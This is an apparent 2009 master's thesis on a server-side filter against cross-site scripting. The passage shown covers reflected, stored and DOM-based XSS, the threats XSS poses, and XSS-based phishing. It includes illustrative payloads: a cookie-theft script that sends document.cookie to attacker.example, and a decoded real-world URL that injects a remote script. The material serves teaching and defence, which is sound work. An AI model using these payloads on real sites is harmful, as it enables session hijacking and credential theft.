SERVER SIDE API TO SECURE XSS Thesis Submitted in partial fulfillment of the requirements for the degree of MASTER OF TECHNOLOGY in COMPUTER SCIENCE & ENGINEERING - INFORMATION SECURITY by KAMESH KUMAR BOGANATHAM (07IS04F) DEPARTMENT OF COMPUTER ENGINEERING NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA SURATHKAL, MANGALORE -575025 July, 2009


    SERVER SIDE API TO SECURE XSS

    Thesis

    Submitted in partial fulfillment of the requirements for the degree of

    MASTER OF TECHNOLOGY in

    COMPUTER SCIENCE & ENGINEERING - INFORMATION SECURITY

    by

    KAMESH KUMAR BOGANATHAM

    (07IS04F)

    DEPARTMENT OF COMPUTER ENGINEERING

    NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA

    SURATHKAL, MANGALORE -575025

    July, 2009

    NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA, SURATHKAL

    D E C L A R A T I O N

    I hereby declare that the Report of the P.G. Project Work entitled “SERVER SIDE API TO SECURE XSS”, which is being submitted to the National Institute of Technology Karnataka, Surathkal, for the award of the degree of Master of Technology in Computer Science and Engineering – Information Security in the Department of Computer Engineering, is a bona fide report of the work carried out by me. The material contained in this report has not been submitted to any university or institution for the award of any degree.

    07IS04F, B KAMESH KUMAR

    -----------------------------------------------------

    (Register Number, Name and Signature of Student)

    Department of Computer Engineering

    Place: NITK, SURATHKAL Date:

    C E R T I F I C A T E

    This is to certify that the P.G. Project Work Report entitled “SERVER SIDE API TO SECURE XSS”, submitted by B KAMESH KUMAR (Reg. No. 07IS04F) as the record of the work carried out by him, is accepted as the P.G. Project Work Report submission in partial fulfillment of the requirements for the award of the degree of Master of Technology in Computer Science and Engineering – Information Security in the Department of Computer Engineering, National Institute of Technology Karnataka, Surathkal.

    External Guide

    (Mr. Radhesh Mohandas)

    Adjunct Faculty

    Department of Computer Engineering

    NITK Surathkal

    Internal Guide

    (Mr. Alwyn R Pais)

    Senior Lecturer

    Department of Computer Engineering

    NITK Surathkal

    Chairman- DPGC

    DEDICATED TO

    THEIR LORDSHIPS

    SRI SRI RADHA VRINDAVANA CHANDRA

    ACKNOWLEDGEMENTS

    I take this opportunity to express my deepest gratitude and appreciation to all those who have helped me, directly or indirectly, towards the successful completion of this project.

    First and foremost, I would like to express my sincere appreciation and gratitude to my esteemed guides, Mr. Radhesh Mohandas, Adjunct Faculty, and Mr. Alwyn R Pais, Senior Lecturer, Department of Computer Engineering, NITK Surathkal, for their insightful advice, encouragement, guidance, critiques and valuable suggestions throughout the course of my project work. Without their continued support and interest, this thesis would not have been the same as presented here.

    I express my deep gratitude to Mr. K. Vinay Kumar, Asst. Professor and Head, Department of Computer Engineering, National Institute of Technology Karnataka, Surathkal, for his constant co-operation and support, and for providing the necessary facilities throughout the M.Tech program.

    I would like to take this opportunity to thank the teaching and non-teaching staff of the Department of Computer Engineering, NITK, for their invaluable help and support during these two years of study. I am also grateful to all my classmates for their help, encouragement and invaluable suggestions.

    Special thanks go to my parents, family and friends, who continuously supported and encouraged me in every possible way towards the successful completion of this thesis. I am forever indebted to you all.

    B Kamesh Kumar


    ABSTRACT

    With the Internet becoming ubiquitous in every aspect of our lives, there has been an increase in web applications providing day-to-day services such as banking, shopping, email and news updates. However, most of these applications have vulnerabilities or security loopholes, such as Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF) and SQL Injection, which are exploited by attackers for malicious purposes. Hence there is a need for APIs and automated security tools to identify and/or prevent these vulnerabilities before an application goes live.

    This work focuses on developing a server-side API against Cross-site Scripting that differentiates an XSS attack from a simple script. Novice users can thus enjoy a safe and better browsing experience without any loss of functionality, and without the need for additional software or configuration on the browser side. Such an API also reduces the burden on web administrators of safeguarding their web applications from malicious XSS attacks.

    Keywords: Web Applications, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF/XSRF), Server-side XSS Filter.


    TABLE OF CONTENTS

    Title

    Declaration

    Certificate

    Dedication

    Acknowledgement

    Abstract

    Table of contents

    List of figures

    List of tables

    Nomenclature/Acronyms

    Chapter I INTRODUCTION

    1.1 Cross-site Scripting Attacks

    1.2 Motivation

    1.3 Organization of Thesis

    Chapter II CROSS-SITE SCRIPTING

    2.1 Introduction to Cross-site Scripting

    2.2 A Basic Example

    2.3 Malicious Code

    2.4 Classification of Cross-site Scripting

    2.4.1 Reflected XSS

    2.4.2 Stored XSS

    2.4.3 DOM-based XSS

    2.5 Threats from Cross-site Scripting

    2.6 Cross-site Scripting and Phishing

    2.6.1 Introduction to Phishing

    2.6.2 Phishing Tricks

    2.6.3 Cross-Site Scripting based Phishing Attack

    2.7 Real World Examples

    2.8 XSS Vs. CSRF

    Chapter III EXISTING XSS DEFENSES

    3.1 AntiSamy

    3.2 The strip_tags()

    3.3 PHP Input Filter

    3.4 HTML_Safe/SafeHTML

    3.5 Kses

    3.6 htmLawed

    3.7 Safe HTML Checker

    3.8 HTML Purifier

    3.9 Summary

    Chapter IV PROBLEM STATEMENT

    Chapter V DIFFERENTIATING XSS FROM SIMPLE SCRIPTS

    Chapter VI IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS

    6.1 Procedure

    6.2 Implementation Details

    6.3 Working of SecureXSS

    6.4 Results

    Chapter VII CONCLUSIONS

    REFERENCES

    APPENDIX I OWASP The Ten Most Critical Web Application Security Vulnerabilities

    APPENDIX II Results of SecureXSS API

    APPENDIX III Results of HTML Purifier

    APPENDIX IV Simple HTML DOM Parser array

    Resume (Bio-Data)

    LIST OF FIGURES

    Fig. No. Description

    2.1 Sample PHP Code for Site Search Engines

    2.2 Sample HTTP Response Page Containing the Tag

    2.3 Cross-Site Scripting in Site Search Engines

    2.4 Sample Malicious Code for Cookie Theft

    2.5 An Attack Scenario of Cross-Site Scripting

    2.6 Examples of Phishing Tricks

    2.7 Cross-Site Scripting based Phishing Attack

    2.8 Maria Sharapova’s Home Page

    2.9 Defacement

    6.1 Server-side XSS Filtering API

    6.2 SecureXSS overhead

    1 MITRE data on Top 10 web application vulnerabilities for 2006

    LIST OF TABLES

    Table No. Description

    3.1 Kses APIs

    5.1 Tags and their attributes which are in favour of attackers

    5.2 Extensions allowed

    5.3 DOM Properties which will cause XSS attacks

    6.1 SecureXSS timing test (overhead) results

    1 OWASP Top 10 Web Application Vulnerabilities

    2 Results of SecureXSS

    3 Results of HTML Purifier


    Nomenclature/Acronyms

    Notation Description

    XSS Cross-site Scripting

    OWASP Open Web Application Security Project

    XSRF/CSRF Cross-site Request Forgery

    PHP Hypertext Preprocessor

    URL Uniform Resource Locator

    URI Uniform Resource Identifier

    HTML Hyper Text Markup Language

    HTTP Hyper Text Transfer Protocol


    CHAPTER 1

    INTRODUCTION

    With the proliferation of the Internet, there has been a surge in web services, such as e-banking and e-shopping, offered by many corporations. Because most of these applications are not developed following security best practices, malicious attacks against these services are increasing. Such attacks exploit vulnerabilities in the applications to obtain material gain or to steal the credentials of the novice users who use these services. This has led to more research in this domain on new tools and techniques to thwart these kinds of attacks. Many research groups in academia and industry are working on more secure programming practices, and on tools that identify vulnerabilities during the development phase and detect attacks in real time.

    The OWASP Top 10 report [OWA] lists the following as the ten most critical web application security vulnerabilities being exploited:

    Cross Site Scripting (XSS)

    Injection Flaws (SQL Injection, XPath Injection, LDAP Injection, etc)

    Malicious File Execution

    Insecure Direct Object Reference

    Cross Site Request Forgery (CSRF)

    Information Leakage and Improper Error Handling

    Broken Authentication and Session Management

    Insecure Cryptographic Storage

    Insecure Communications

    Failure to Restrict URL Access

    In this work, we focus on Cross-site Scripting (XSS), which allows an attacker to insert malicious script into a web application that may cause any kind of harm to legitimate users. In the process, we developed a server-side XSS filtering API that differentiates a potential XSS attack from a simple script and strips the attack off. The main goal of this work is to provide web administrators with an XSS solution that safeguards their applications from attackers, giving novice users a safe and better browsing experience without any loss of functionality.

    1.1 Cross-site Scripting Attacks

    The cross-site scripting attack method was first discussed in a CERT advisory in 2000 [CER]. Even today, however, cross-site scripting (XSS) remains one of the most common vulnerabilities in web applications. It results from insufficient filtering of data that is received from a malicious person and then sent to third parties. Systems that receive data from users and display it in other users' browsers are highly vulnerable to XSS attacks. Wikis, forums, chats and web mail are all good examples of applications that are most susceptible to XSS.

    Cross-site scripting (XSS) can be defined as a security exploit in which an attacker inserts malicious code into a page returned by a web server that the user trusts. This code may reside on the web server or be explicitly inserted when the user browses to the particular web site. It may contain JavaScript or just HTML, and it may use third-party sites as sources or rely only on the resources of the targeted server. XSS attacks typically involve JavaScript code from a malicious web server executing in a user's web browser. Chapter 2 gives a brief overview of XSS attacks and their types, with examples and illustrations.

    1.2 Motivation

    In recent years, dynamic Web applications such as online banking systems and online shops have become more and more popular. At the same time, security attacks that exploit Web application vulnerabilities are increasing dramatically. Among such vulnerabilities, Cross-Site Scripting is the most common security issue; as already noted, it is the top vulnerability in the OWASP 2007 report. It enables attackers to steal credentials from a victim, to gather sensitive information or to make a Web site unavailable. To mitigate such serious impact, Web applications should use an effective solution against Cross-Site Scripting flaws. Manual security testing, however, is both expensive and error-prone because of the increasing complexity of Web applications. Hence, automated tools for detecting Cross-Site Scripting flaws are essential.


    We have investigated several available solutions that claim to be state-of-the-art. Unfortunately, most of them are not effective, because they fail to differentiate simple scripts from potential XSS attacks. We have therefore developed SecureXSS (pronounced "Secure Excess"), an open-source server-side filter for detecting and filtering Cross-Site Scripting attacks in Web applications.

    1.3 Organization of Thesis

    The rest of the thesis is organized as follows. Chapter 2 gives brief information about XSS attacks and their types, with live examples and illustrations. Chapter 3 discusses the available solutions for XSS, while Chapter 4 describes the problem statement. Chapter 5 details our solution for mitigating XSS, called SecureXSS: Server-side XSS Filter. Chapter 6 gives the implementation details and experimental results, and Chapter 7 concludes the thesis along with future work, followed by the references. Appendix I details the Top 10 most critical web application vulnerabilities. Appendix II shows the results of the SecureXSS API, Appendix III shows the results of HTML Purifier, and Appendix IV shows the Simple HTML DOM Parser array.


    CHAPTER 2

    CROSS-SITE SCRIPTING

    Cross-Site Scripting vulnerabilities are quite widespread. A look at the Bugtraq mailing list shows innumerable postings reporting Cross-Site Scripting holes on a regular basis. Cross-Site Scripting vulnerabilities are the most common security loopholes and are found in over 80 percent of Web sites. Hence, the likelihood that a given Web site is vulnerable to XSS is extremely high. According to the Information-Technology Promotion Agency (IPA), from July 2004 to September 2005 attacks using Cross-Site Scripting were the most serious issue among all Web application attacks, accounting for 42%, while SQL Injection ranked second with 16%. It is therefore imperative to make Web applications secure against XSS attacks.

    In this chapter, we first explain the XSS problem briefly with a basic example, and then introduce malicious code and describe how XSS attacks work. After presenting the classification of XSS, we describe the risks that XSS may cause.

    2.1 Introduction to Cross-site Scripting

    As introduced in the previous chapter, Web applications are becoming not only increasingly popular but also more and more vulnerable, and attack techniques exploiting various types of Web application vulnerabilities are becoming more sophisticated. A particular class of these techniques is referred to as Cross-Site Scripting (or HTML code injection). It takes advantage of Web applications that do not validate user input before displaying it back to the user. Such attacks commonly involve three parties: the user (victim), the attacker, and the XSS-vulnerable website. The attacker uses the poorly designed but legitimate website as a vehicle to execute malicious code in the user's browser, as if the code had originated from a trusted source.

    As explained above, XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread. They occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way of knowing that the script should not be trusted, so it executes the script. Because the browser believes the script came from a trusted source, the malicious script can access cookies, session tokens, or other sensitive information retained by the browser and used with that site. Such scripts can even rewrite the content of the HTML page [XSS].

    2.2 A Basic Example

    Most web applications contain site search engines, which usually display the results on the screen together with the search phrase entered by the user. As an example, consider the PHP code shown in Figure 2.1, in which the text after “Search results for” is generated dynamically from the user input. When the search phrase (user input) is not sanitized properly, Cross-Site Scripting may occur, and it can be exploited in an attack.

    As illustrated in Figure 2.3(a), after clicking the search button, the search phrase entered in the form field (here, search text) is displayed in the response page, regardless of the search results. Next, we experiment with HTML tags. As illustrated in Figure 2.3(b), the returned search phrase (here, Hello World) is formatted as bold, instead of displaying the literal text we entered (Hello World embedded in an HTML bold tag). Besides displaying a formatted search phrase, we can also cause JavaScript code to be executed in the browser, since most browsers enable JavaScript by default. As illustrated in Figure 2.3(c), instead of the search phrase, a JavaScript alert box with the text “XSS Vulnerability” pops up. This happens because the browser interprets the search phrase we entered as HTML markup rather than as text. In the sample HTTP response page shown in Figure 2.2, the <script> tag introduces a JavaScript program, and therefore it is not displayed by the browser.
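    The code of Figure 2.1 is not reproduced in this text. The following JavaScript (Node.js) sketch is therefore only an illustration of the same behaviour, not the thesis code. It contrasts a page that echoes the search phrase unchanged with one that HTML-encodes the phrase first. The function names are hypothetical, and the three input strings are assumptions modelled on the cases of Figure 2.3.

```javascript
// Hypothetical helper: replaces characters that are significant in HTML with entity
// references, so user input is displayed as text instead of being parsed as markup.
// '&' is replaced first so that the entities produced afterwards are not double-encoded.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the search phrase is concatenated into the response unchanged.
function renderResultsUnsafe(phrase) {
  return "<p>Search results for " + phrase + "</p>";
}

// Safer pattern: the phrase is HTML-encoded before it is placed in the response.
function renderResultsSafe(phrase) {
  return "<p>Search results for " + escapeHtml(phrase) + "</p>";
}

// Assumed inputs for the three cases: plain text, formatted text, executable script.
const inputs = [
  "search text",
  "<b>Hello World</b>",
  '<script>alert("XSS Vulnerability")</script>',
];

for (const phrase of inputs) {
  console.log("unsafe:", renderResultsUnsafe(phrase));
  console.log("safe:  ", renderResultsSafe(phrase));
}
```

    In the safe output the browser would show the tags literally instead of rendering bold text or running the alert. In PHP, the built-in htmlspecialchars() function plays a similar role.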

    2.3 Malicious Code

    Considering the example above, one may ask: it just throws up an alert box, so how dangerous can it be? Indeed, alert pop-ups are annoying, but they do not really cause security issues. We use them only to demonstrate that a Web application is vulnerable to XSS. If the JavaScript alert function can be executed, there is usually no reason why other JavaScript functions containing malicious code cannot succeed as well.


    Figure 2.1: Sample PHP Code for Site Search Engines

    Figure 2.2: Sample HTTP Response Page Containing the Tag

    (a) Search for a Simple Text

    (b) Search for a Formatted Text


    (c) Search for an Executable Script

    Figure 2.3: Cross-Site Scripting in Site Search Engines

    Attackers exploit XSS vulnerabilities in order to execute the injected malicious code. What exactly does malicious code mean, and what impact can it have? Next, we give an introduction to malicious code.

    By default, most Web browsers run scripts embedded in Web pages downloaded from a Web server. Such scripts are usually written in scripting languages such as JavaScript and VBScript, and are introduced by the HTML <script> tag. In addition to the scripting tag, many other HTML tags can be misused to load malicious code.

    Malicious code is able to rewrite an HTML page with fraudulent content or redirect the client's browser to an attacker's page. It can even access authentication cookies, session management tokens, or other sensitive information. With this information, an attacker is able to hijack the victim's active session and thus bypass the authentication process completely.

    Consider the script in Figure 2.4. Suppose it is successfully injected into a page of a site (e.g. www.xss.site) and a victim's browser loads this page. The embedded script is then executed and steals the victim's cookie for this site. The attacker can now access the victim's account and masquerade as the victim. Figure 2.5 illustrates this scenario.

    Figure 2.4: Sample Malicious Code for Cookie Theft


    Figure 2.5: An Attack Scenario of Cross-Site Scripting

    The steps shown in Figure 2.5 are explained below.

    (1) A user logs in to an XSS-vulnerable site.

    (2) The site sets a cookie (e.g. ID=123) for the user, which is saved in the browser.

    (3) An attacker knows that the site displays a parameter (e.g. the parameter “name”) without validating it. He constructs a link containing the malicious code described in Figure 2.4 and tricks the user into clicking on this link.

    (4) The unsuspecting user clicks on the link, and an HTTP request containing the attacker's malicious code is sent to the XSS-vulnerable site.

    (5) In response to the request, the site generates a response page with the malicious code embedded and displays this page to the user.

    (6) While the user views the response page, the malicious code is executed in the user's browser, and the cookies of that web site are sent to the attacker.

    (7) The attacker now has access to the user's account and can masquerade as the user.
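    The JavaScript (Node.js) sketch below makes steps (3) to (5) concrete. It builds such a link and simulates a vulnerable server that reflects the parameter. It is an illustration under stated assumptions and is not the code of Figure 2.4. The site www.xss.site and the parameter “name” come from the text. The page /welcome.php, the payload and the collecting server attacker.example are hypothetical. Steps (6) and (7) take place in the victim's browser and are not simulated.

```javascript
// Hypothetical payload: it would send the victim's cookies to attacker.example if it ran
// in a browser. Here it is only a string.
const payload =
  '<script>new Image().src="http://attacker.example/log?c="+encodeURIComponent(document.cookie)</script>';

// Step (3): the attacker percent-encodes the payload so it can travel inside a link.
// /welcome.php is an assumed page that displays the "name" parameter.
const link =
  "http://www.xss.site/welcome.php?name=" + encodeURIComponent(payload);

// Steps (4)-(5): the vulnerable server decodes the parameter and echoes it into
// the response page without validating or encoding it.
function vulnerableResponse(requestUrl) {
  const name = new URL(requestUrl).searchParams.get("name");
  return "<html><body>Welcome, " + name + "</body></html>";
}

const responsePage = vulnerableResponse(link);
console.log(link);         // no raw '<', '>' or '"': the payload is hidden in %XX escapes
console.log(responsePage); // the <script> element is now part of a page served by www.xss.site
```

    The encoded link looks harmless, yet the decoded payload becomes part of a page from the trusted site. This is why the browser cannot tell it apart from the site's own scripts.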

    Possible sources of malicious code include the URL query string, HTML form fields, HTTP headers and cookies. Because the malicious code is embedded in a website the user trusts, it can perform dangerous operations unhindered. Websites using SSL are no better protected against malicious code than other websites. SSL only encrypts the data transmitted over the connection, including the malicious code; it does not attempt to validate that data. XSS attacks therefore succeed as usual, except that they take place over an encrypted connection.

    2.4 Classification of Cross-site Scripting

    Generally, Cross-Site Scripting attacks can be classified into three categories: Reflected (non-persistent), Stored (persistent) and DOM-based. Before describing these categories, we briefly introduce the DOM, which is needed to understand the third type of XSS.

    The Document Object Model (DOM) is a cross-platform, language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. Objects in the DOM (sometimes called "elements") may be specified and addressed according to the syntax and rules of the programming language used to manipulate them. In simple terms, the DOM is the way JavaScript sees its containing HTML page and the browser state. Next, we describe the three categories in turn.

    2.4.1 Reflected XSS

    Reflected XSS (also referred to as non-persistent XSS) is by far the most common type. In this type, the page containing the malicious code is returned to the Web browser immediately after a request.

    Normally, a non-persistent XSS attack requires deceiving a user, through social engineering techniques, into visiting a specially manipulated URL with embedded malicious code. When the user is tricked into clicking the malicious link, the code embedded in the URL is reflected back by the server and executed in the Web browser, and the attack succeeds.


    2.4.2 Stored XSS

    In contrast to reflected XSS, stored XSS (also referred to as persistent XSS) means that malicious code injected into a website is stored (in a database or XML files) over a longer period and displayed to users in a web page later. This kind of XSS is more serious than the other types. An attacker can inject the malicious code just once and affect a large number of unsuspecting users, and it is hardly even necessary to trick users into clicking a link containing malicious code. For example, if the malicious code is stored in a database, an innocent user may become a victim simply by viewing the page that contains it, without clicking any link.

    Another kind of stored XSS uses techniques that manipulate the user's cookies. With such techniques, attackers can tamper with the cookie content, inserting malicious code that is executed each time the user visits the website.

    Web applications that are especially vulnerable to stored XSS include discussion forums, guest books and webmail systems. RSS feeds, which are widely used by web blogs and news sites, can also serve as a vehicle for such attacks.
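    The sketch below shows the one-injection, many-victims property in JavaScript (Node.js). A hypothetical in-memory guest book stands in for the database or XML store, and every visitor is served the stored entry. It illustrates output encoding as one possible defence under these assumptions. It is not the SecureXSS approach, which is described in later chapters.

```javascript
// Hypothetical in-memory guest book standing in for the database or XML store.
const guestBook = [];

// Entries are stored exactly as submitted; no filtering happens on input.
function postEntry(author, message) {
  guestBook.push({ author, message });
}

// HTML-encodes text so that stored input is displayed rather than executed.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Builds the page that every visitor receives; `encode` switches output encoding on or off.
function renderGuestBook(encode) {
  const out = encode ? escapeHtml : (s) => s;
  return guestBook
    .map((e) => "<li>" + out(e.author) + ": " + out(e.message) + "</li>")
    .join("\n");
}

postEntry("alice", "Nice site!");
postEntry("mallory", "<script>alert('stored XSS')</script>"); // injected only once

// Every later visitor is served the same stored payload without clicking any crafted link.
for (const visitor of ["bob", "carol", "dave"]) {
  console.log(visitor, renderGuestBook(false).includes("<script>"));
}
console.log(renderGuestBook(true)); // with encoding, the payload is shown as inert text
```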

    Here is a real-world example of a persistent XSS attack on the popular online auction website eBay. As reported by US-CERT in April 2006, when an eBay user posts an auction, tags are allowed to be included in the auction description, which creates an XSS vulnerability in the eBay Web site. Attackers were exploiting this vulnerability to redirect auction viewers to a fake eBay login page that requested login information in order to steal credentials [USC].

    2.4.3 DOM-based XSS

    Besides the XSS attacks described above, which are considered standard XSS, there is a third kind of XSS attack, namely DOM-based XSS. Standard XSS attacks rely on dynamic web pages. A DOM-based XSS attack, by contrast, does not necessarily require sending malicious code to the server, and can therefore also target static HTML pages.


    The problem lies in the client-side script (i.e. JavaScript) within the page itself, which retrieves data from certain DOM objects without encoding the URL characters. The DOM objects mentioned here include:

    - document.location

    - document.URL

    - document.referrer

    We illustrate this with a simple example. Assume that the following script resides within an HTML page. It displays the text retrieved from the current URL somewhere in the page.

    document.write(document.URL);

    When we enter the following URL into the address bar of a browser, an alert box with the text “XSS” pops up, revealing an XSS hole.

    http://www.xss.site/index.html#<script>alert("XSS")</script>
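    Node.js has no browser DOM, so the JavaScript sketch below only simulates this example. It makes two assumptions. First, the payload in the URL is a <script> element. Second, the browser exposes the fragment without percent-encoding it. The sketch shows that the part after '#' never reaches the server, while the page's own script writes it into the document. The function names are hypothetical.

```javascript
// Assumed URL; the payload after '#' is taken to be a <script> element.
const typedUrl = 'http://www.xss.site/index.html#<script>alert("XSS")</script>';

// Only the part before '#' is requested from the server; the fragment stays in the
// browser, so a check on the server side never sees the payload.
const requested = typedUrl.split("#")[0];

// Stand-in for document.write(document.URL): the whole URL becomes page markup.
function writeUrlUnsafe(documentUrl) {
  return documentUrl;
}

// Safer variant: encode the URL text before it is written into the page.
function writeUrlSafe(documentUrl) {
  return documentUrl
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

console.log(requested);                // http://www.xss.site/index.html
console.log(writeUrlUnsafe(typedUrl)); // contains a live <script> element
console.log(writeUrlSafe(typedUrl));   // the script is rendered as text
```

    In a real page, writing the value through a text node (for example, by assigning to an element's textContent) instead of calling document.write avoids markup interpretation altogether.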

    2.5 Threats from Cross-site Scripting

    Some of the common threats from XSS attacks are listed below:

    Cookie theft and account hijacking: one of the most severe XSS attacks involves cookie theft and account hijacking, as in the scenario illustrated in Figure 2.5. Credentials stored in cookies can be stolen by attackers, making it possible for them to steal a user's identity and access his confidential information. For normal users, this means that personal data such as credit card information or bank account details may be misused. If the accounts of highly privileged users, such as administrators, are stolen via XSS, attackers may be able to access the web server and the backend database system, and thus gain full control of the web application.

    Misinformation: another critical threat from XSS is credentialed misinformation. XSS attacks may include malicious code that spies on the user's surfing behavior and gathers statistics (e.g. logging the user's clicks or the history of sites visited), resulting in a loss of privacy. Another kind of misinformation arises because malicious code, once executed in a browser, can modify the presentation of page content. This enables an attacker to manipulate a press release or important news, or even to affect the stock price of companies, resulting in a loss of integrity. Malicious script may also modify the login page; combined with Phishing, this can lead a victim to submit his login information to the attacker unknowingly.

    Denial of Service: for an enterprise, it is imperative that its Web applications are accessible at all times. However, malicious script can cause a loss of availability, for example by redirecting users' browsers to other websites. The spread of the XSS worm on Myspace.com is another example of a Denial of Service attack. From the users' point of view, malicious script can also make a browser crash or become inoperable (e.g. by throwing infinitely many alert boxes), so that the user can no longer reach the Web application.

    Browser exploitation: malicious script can redirect client browsers to an attacker's site, where the attacker can exploit specific security holes in web browsers to take control of users' computers by executing arbitrary commands, such as installing Trojan horse programs on the client or uploading local data containing sensitive information.

    2.6 Cross-site Scripting and Phishing

    This section briefly explains phishing based on cross-site scripting. Section 2.6.1 introduces phishing, Section 2.6.2 explains some phishing tricks, and Section 2.6.3 explains cross-site scripting based phishing attacks.

    2.6.1 Introduction to Phishing

    Phishing (as in fishing for sensitive data) is the act of tricking someone into giving away sensitive information, such as credit card numbers, passwords, bank account information or other personal data, using social engineering techniques [STA, OLL].

    Phishing usually uses email as the medium. The emails appear to come from banks and ask users to log into their online banking system, change their password, or enter their credit card number. In recent years, Phishing has become a major issue: according to the Pew study [PEW], by October 2005 more than a third of email users had been exposed to Phishing, and two percent had responded by providing personal financial information.

    (a) Similar or Misspelled Domain Names

    (b) URL Hex Encoding

    (c) Using HTML Coding to Hide the Real Link

    Figure 2.6: Examples of Phishing Tricks

    2.6.2 Phishing Tricks

    Tricks commonly used for Phishing include:

    Similar or misspelled domain names (see Figure 2.6(a)). Phishers may also replace a lowercase “l” with an uppercase “I”, because the two are hard for users to distinguish.

    Using an encoded URL. The URL is encoded using Hex, Unicode or UTF-8 encoding to disguise its true value. An example of Hex encoding is illustrated in Figure 2.6(b).

    Using HTML coding to hide the real link (see Figure 2.6(c)). The real link is not directly visible to the user; as soon as he clicks the link, he is taken to the attacker's fake site instead of the site indicated.

    Using fake banner advertising. Phishers can copy banner advertising and publish it on the Internet. As in the previous trick, the banner links to the fake site, and the real destination is not directly visible to users.
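    Two of these tricks, hex-encoded URLs and links whose visible text differs from their real target, can be exposed mechanically. The JavaScript (Node.js) sketch below does this by decoding %XX escapes and comparing host names. It is a simple heuristic for illustration, not a complete phishing detector. The function names are hypothetical, and all addresses are invented (.example is a reserved domain); the URLs shown in Figure 2.6 are not reproduced here.

```javascript
// Decodes %XX ("hex") escapes and returns the host the link really points to.
// Throws if the decoded string is not a valid absolute URL.
function realHost(href) {
  return new URL(decodeURIComponent(href)).hostname;
}

// Flags a link whose visible text names one host while its href targets another,
// as in the trick of hiding the real link behind HTML coding.
// Assumes the visible text is itself an absolute URL.
function isDeceptiveLink(visibleText, href) {
  return new URL(visibleText).hostname !== realHost(href);
}

console.log(realHost("http://%65%76%69%6C.example/login")); // evil.example
console.log(isDeceptiveLink("http://www.mybank.example/", "http://%65%76%69%6C.example/login")); // true
console.log(isDeceptiveLink("http://www.mybank.example/", "http://www.mybank.example/login")); // false
// The URL parser lowercases host names, turning a look-alike uppercase "I" into a plainly different "i".
console.log(isDeceptiveLink("http://www.paypal.example/", "http://www.paypaI.example/")); // true
```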


    2.6.3 Cross-Site Scripting based Phishing Attack

    The Phishing tricks described above misdirect users to fake sites. If, however, the Phishing page is served by the real site, the attack is more dangerous, because users trust the real site. Such attacks are possible when a site is vulnerable to XSS. The example below demonstrates this kind of attack.

    A Cross-site Scripting based Phishing attack involves the following steps:

    1. Finding Cross-site Scripting vulnerabilities in a site.

    2. Embedding malicious content into a fraudulent email. The attacker can use an encoded URL to obfuscate the true destination.

    3. Sending the spoofed email to victims.

    When a user clicks the link in the spoofed email, the login part of the returned page is replaced with the fake login page from the attacker's site, while the other contents of the page and the address bar remain unchanged. The user is not aware of this and logs in with his personal information, which is sent to the attacker. After login, the user is redirected back to the real site. Figure 2.7 illustrates this scenario.

    XSS based Phishing attacks can bypass traditional Phishing defenses such as blacklists and SSL notices. The first step in an XSS based Phishing attack is to find XSS vulnerabilities in an insecure Web site.
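    To make that first step concrete, here is a minimal sketch (hypothetical function names and markup) of the kind of reflection flaw an attacker looks for: a request parameter copied into the page verbatim, next to the same page with the value escaped by Python's standard html.escape.

```python
import html


def render_greeting_unsafe(name: str) -> str:
    # Vulnerable: the request parameter is copied into the HTML verbatim.
    return "<p>Welcome, " + name + "</p>"


def render_greeting_safe(name: str) -> str:
    # html.escape encodes &, <, >, " and ' so the value is displayed as text.
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


# Hypothetical payload that would load a fake login form from the attacker's site.
payload = '<script src="http://attacker.example/login.js"></script>'
print(render_greeting_unsafe(payload))
print(render_greeting_safe(payload))
```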

    2.7 Real World Examples

    On April 1, 2007, there was an interesting prank on the home page of Maria Sharapova, the famous tennis player (Figure 2.8). Apparently someone had identified an XSS vulnerability, which was used to inform Maria's fan club that she was quitting her tennis career to become a CISCO CCIE Security Expert.

    The URL that causes the XSS issue looks like the following:


    http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/script%3E%3C!--&pagenumber=1

    Figure 2.7: Cross-Site Scripting based Phishing Attack


    Notice that the actual XSS vulnerability affects the page GET parameter, which is also URL-encoded. In its decoded form, the value of the page parameter looks like this:

    // --></script><script src=http://www.securitylab.ru/upload/story.js></script><!--

    The first part of the payload, // --></script>, comments out everything generated by the page up until that point and closes the script element. The second part of the payload includes a remote script hosted at www.securitylab.ru. Finally, the trailing <!-- opens an HTML comment that makes the rest of the page disappear.
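    The decoding described above can be checked mechanically. This sketch uses Python's standard urllib.parse to extract and percent-decode the page parameter from the URL quoted earlier; the helper name decoded_param is our own.

```python
from urllib.parse import parse_qs, urlsplit

SHARAPOVA_URL = (
    "http://www.mariasharapova.com/defaultflash.sps?page=//%20--"
    "%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js"
    "%3E%3C/script%3E%3C!--&pagenumber=1"
)


def decoded_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, percent-decoded."""
    return parse_qs(urlsplit(url).query)[name][0]


print(decoded_param(SHARAPOVA_URL, "page"))
# prints: // --></script><script src=http://www.securitylab.ru/upload/story.js></script><!--
```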

    Figure 2.8: Maria Sharapova's Home Page

    The script hosted at SecurityLab has the following content:

    document.write("Maria Sharapova");
